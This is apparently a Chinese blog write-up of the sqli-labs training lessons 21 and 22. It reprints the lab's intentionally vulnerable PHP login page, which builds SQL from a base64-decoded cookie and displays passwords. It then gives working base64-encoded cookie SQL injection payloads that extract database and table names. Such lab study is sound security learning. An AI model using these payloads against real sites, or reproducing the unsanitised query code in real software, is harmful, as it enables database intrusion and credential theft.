标签:Adv users SQLi value echo LABS uname nbsp mysql
Less-21:括号+单引号绕过+base64cookie编码
总感觉我已经把sql注入做成代码审计了:P
1 <?php
2 //including the Mysql connect parameters.
3 include("../sql-connections/sql-connect.php");
4 if(!isset($_COOKIE['uname']))
5 {
6 //including the Mysql connect parameters.
7 include("../sql-connections/sql-connect.php");
8
9 echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
10 echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
11 echo "<div style='padding-top:10px; font-size:15px;'>";
12
13
14 echo "<!--Form to post the contents -->";
15 echo '<form action=" " name="form1" method="post">';
16
17 echo ' <div style="margin-top:15px; height:30px;">Username : ';
18 echo ' <input type="text" name="uname" value=""/> </div>';
19
20 echo ' <div> Password : ';
21 echo ' <input type="text" name="passwd" value=""/></div></br>';
22 echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
23
24 echo '</form>';
25 echo '</div>';
26 echo '</div>';
27 echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
28 echo '<font size="3" color="#FFFF00">';
29 echo '<center><br><br><br>';
30 echo '<img src="../images/Less-21.jpg" />';
31 echo '</center>';
32
33 function check_input($value)
34 {
35 if(!empty($value))
36 {
37 $value = substr($value,0,20); // truncation (see comments)
38 }
39 if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
40 {
41 $value = stripslashes($value);
42 }
43 if (!ctype_digit($value)) // Quote if not a number
44 {
45 $value = "'" . mysql_real_escape_string($value) . "'";
46 }
47 else
48 {
49 $value = intval($value);
50 }
51
52 return $value;
53 }
54 echo "<br>";
55 echo "<br>";
56 if(isset($_POST['uname']) && isset($_POST['passwd']))
57 {
58
59 echo "<h1>hello master*****************************************************************************************</h1>";
60
61 $uname = check_input($_POST['uname']);
62 $passwd = check_input($_POST['passwd']);
63
64 $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
65 $result1 = mysql_query($sql);
66 $row1 = mysql_fetch_array($result1);
67
68 echo "\n<h1>hello#####################################################################################################333</h1>\n";
69 if($row1)
70 {
71 echo '<font color= "#FFFF00" font size = 3 >';
72 setcookie('uname', base64_encode($row1['username']), time()+3600);
73
74 echo "I LOVE YOU COOKIES";
75 echo "</font>";
76 echo '<font color= "#0000ff" font size = 3 >';
77 echo 'Your Cookie is: ' .$cookee;
78 echo "</font>";
79 echo "<br>";
80 print_r(mysql_error());
81 echo "<br><br>";
82 echo '<img src="../images/flag.jpg" />';
83 echo "<br>";
84 header ('Location: index.php');
85 }
86 else
87 {
88 echo '<font color= "#0000ff" font size="3">';
89 echo "Try again looser";
90 print_r(mysql_error());
91 echo "</br>";
92 echo "</br>";
93 echo '<img src="../images/slap.jpg" />';
94 echo "</font>";
95 }
96 }
97
98 echo "</font>";
99 echo '</font>';
100 echo '</div>';
101
102 }
103 else
104 {
105
106 if(!isset($_POST['submit']))
107 {
108 $cookee = $_COOKIE['uname'];
109
110 echo "<h1>hello master$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</h1>";
111
112 $format = 'D d M Y - H:i:s';
113 $timestamp = time() + 3600;
114
115 echo "<center>";
116 echo "<br><br><br><b>";
117 echo '<img src="../images/Less-21.jpg" />';
118 echo "<br><br><b>";
119 echo '<br><font color= "red" font size="4">';
120 echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
121 echo "</font><br>";
122 echo '<font color= "cyan" font size="4">';
123 echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
124 echo "</font><br>";
125 echo '<font color= "#FFFF00" font size = 4 >';
126 echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
127 echo '<font color= "orange" font size = 5 >';
128 echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
129
130 $cookee = base64_decode($cookee);
131 echo "<br></font>";
132 $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
133 $result=mysql_query($sql);
134
135 if (!$result)
136 {
137 die('Issue with your mysql: ' . mysql_error());
138 }
139 $row = mysql_fetch_array($result);
140 if($row)
141 {
142 echo '<font color= "pink" font size="5">';
143 echo 'Your Login name:'. $row['username'];
144 echo "<br>";
145 echo '<font color= "grey" font size="5">';
146 echo 'Your Password:' .$row['password'];
147 echo "</font></b>";
148 echo "<br>";
149 echo 'Your ID:' .$row['id'];
150 }
151 else
152 {
153 echo "<center>";
154 echo '<br><br><br>';
155 echo '<img src="../images/slap1.jpg" />';
156 echo "<br><br><b>";
157 //echo '<img src="../images/Less-20.jpg" />';
158 }
159 echo '<center>';
160 echo '<form action="" method="post">';
161 echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
162 echo '</form>';
163 echo '</center>';
164 }
165 else
166 {
167 echo '<center>';
168 echo "<br>";
169 echo "<br>";
170 echo "<br>";
171 echo "<br>";
172 echo "<br>";
173 echo "<br>";
174 echo '<font color= "#FFFF00" font size = 6 >';
175 echo " Your Cookie is deleted";
176 setcookie('uname', base64_encode($row1['username']), time()-3600);
177 header ('Location: index.php');
178 echo '</font></center></br>';
179
180 }
181
182
183 echo "<br>";
184 echo "<br>";
185 //header ('Location: main.php');
186 echo "<br>";
187 echo "<br>";
188
189 //echo '<img src="../images/slap.jpg" /></center>';
190 //logging the connection parameters to a file for analysis.
191 $fp=fopen('result.txt','a');
192 fwrite($fp,'Cookie:'.$cookee."\n");
193
194 fclose($fp);
195
196 }
197 ?>
源码+一点点小增加
注意点:
- 不要submit参数
- cookie要有一个uname的参数
- cookie的参数要base64编码过的
- 绕过条件是括号加单引号
查数据库:
uname=YWRtaW4nKSAgYW5kIChzZWxlY3QgMSBmcm9tIChzZWxlY3QgY291bnQoKiksY29uY2F0X3dzKCctJywoc2VsZWN0IGRhdGFiYXNlKCkpLGZsb29yKHJhbmQoMCkqMikpIGFzIGEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IGEpIGIpIw==
查数据表:
uname=YWRtaW4nKSB1bmlvbiAoU0VMRUNUICogRlJPTSAoU0VMRUNUIG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSxuYW1lX2NvbnN0KChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSksMSkpIGEpIw==
Less-22:双引号绕过+21套路
查数据表:
payload:admin" union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)#
Cookie:uname=YWRtaW4iIHVuaW9uIChTRUxFQ1QgKiBGUk9NIChTRUxFQ1QgbmFtZV9jb25zdCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkpLDEpLG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSkgYSkj
Less-23:双引号绕过+21套路
标签:Adv,users,SQLi,value,echo,LABS,uname,nbsp,mysql 来源: https://www.cnblogs.com/chrysanthemum/p/11626902.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。